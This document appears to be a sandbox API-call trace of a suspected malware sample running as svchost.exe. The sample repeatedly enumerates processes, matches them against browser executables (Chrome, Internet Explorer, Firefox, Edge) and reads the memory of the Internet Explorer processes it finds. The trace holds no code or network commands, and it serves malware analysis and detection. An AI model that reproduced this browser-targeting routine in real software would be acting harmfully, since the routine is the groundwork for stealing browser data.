	[0201.446] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.446] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.447] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.447] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0201.447] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.447] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.447] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0201.448] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x1fb0
	[0201.448] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.448] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0201.448] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.448] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.448] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.449] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0201.449] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.449] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.449] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0201.450] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x1fb4
	[0201.450] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.450] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0201.450] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.450] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.451] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.451] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0201.451] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.451] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.452] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0201.452] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x1fb8
	[0201.453] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.453] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0201.453] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.453] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.453] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.453] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0201.453] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.453] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.454] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0201.454] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x1fbc
	[0201.454] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.454] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0201.455] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.455] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.455] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.455] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0201.456] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.456] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.456] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0201.457] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x1fc0
	[0201.457] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.457] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0201.457] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.457] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.458] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.458] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0201.458] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.458] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.459] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0201.459] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x1fc4
	[0201.459] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.459] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0201.460] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.460] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.460] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.460] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0201.460] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.460] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.460] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0201.461] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x1fc8
	[0201.461] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.462] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0201.462] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.462] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.462] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.462] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0201.462] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.462] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.462] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0201.463] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x1fcc
	[0201.463] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.463] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0201.464] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.464] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.464] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.464] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0201.465] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.465] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.465] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0201.466] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x1fd0
	[0201.466] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.466] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0201.466] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.466] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.467] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.467] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0201.467] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.467] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.468] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0201.469] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x1fd4
	[0201.469] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.469] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0201.469] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.469] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.470] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.470] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0201.470] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.470] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.470] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0201.471] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x1fd8
	[0201.471] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.471] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0201.472] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.472] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.473] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.473] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0201.473] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.473] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.474] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0201.474] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x1fdc
	[0201.474] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.475] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0201.475] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.475] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.475] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.476] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0201.476] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.476] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.476] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0201.477] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x1fe0
	[0201.477] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.477] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0201.477] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.477] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0201.478] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.478] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0201.478] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.478] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.478] NtQueryInformationProcess (in: ProcessHandle=0x1fe0, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0201.478] ReadProcessMemory (in: hProcess=0x1fe0, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0201.478] ReadProcessMemory (in: hProcess=0x1fe0, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0201.478] ReadProcessMemory (in: hProcess=0x1fe0, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0201.478] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0201.479] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0201.479] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x1fe4
	[0201.479] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.480] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0201.480] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.480] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0201.480] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.480] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0201.480] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.480] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.481] NtQueryInformationProcess (in: ProcessHandle=0x1fe4, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0201.481] ReadProcessMemory (in: hProcess=0x1fe4, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0201.481] ReadProcessMemory (in: hProcess=0x1fe4, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0201.481] ReadProcessMemory (in: hProcess=0x1fe4, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0201.481] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0201.481] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0201.482] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x1fe8
	[0201.482] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.482] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0201.482] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.482] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.482] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.482] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0201.483] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.483] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.483] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0201.484] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x1fec
	[0201.484] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.484] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0201.484] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.484] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.484] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.484] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0201.485] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.485] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.485] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0201.486] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x1ff0
	[0201.486] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.486] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0201.486] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.486] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.486] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.486] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0201.487] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.487] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.487] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0201.487] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1
	[0201.488] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb98) returned 0x1ff4
	[0201.488] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.488] StrStrIA (lpFirst="dllhost.exe", lpSrch="chrome.exe") returned 0x0
	[0201.489] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.489] StrStrIA (lpFirst="dllhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.489] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.489] StrStrIA (lpFirst="dllhost.exe", lpSrch="firefox.exe") returned 0x0
	[0201.489] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.489] StrStrIA (lpFirst="dllhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.490] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0201.490] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x1ff8
	[0201.490] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.490] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0201.491] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.491] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.491] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.491] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0201.491] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.491] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.492] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0201.492] CloseHandle (hObject=0x188) returned 1
	[0201.492] Sleep (dwMilliseconds=0x64) 
	[0201.600] GetCurrentProcessId () returned 0x110
	[0201.600] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x188
	[0201.606] Process32First (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0201.608] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0201.610] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0201.612] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x1ffc
	[0201.613] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.613] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0201.613] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.613] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.614] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.614] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0201.614] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.614] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.615] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0201.627] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x2004
	[0201.627] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.627] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0201.627] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.627] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.627] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.627] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0201.628] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.628] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
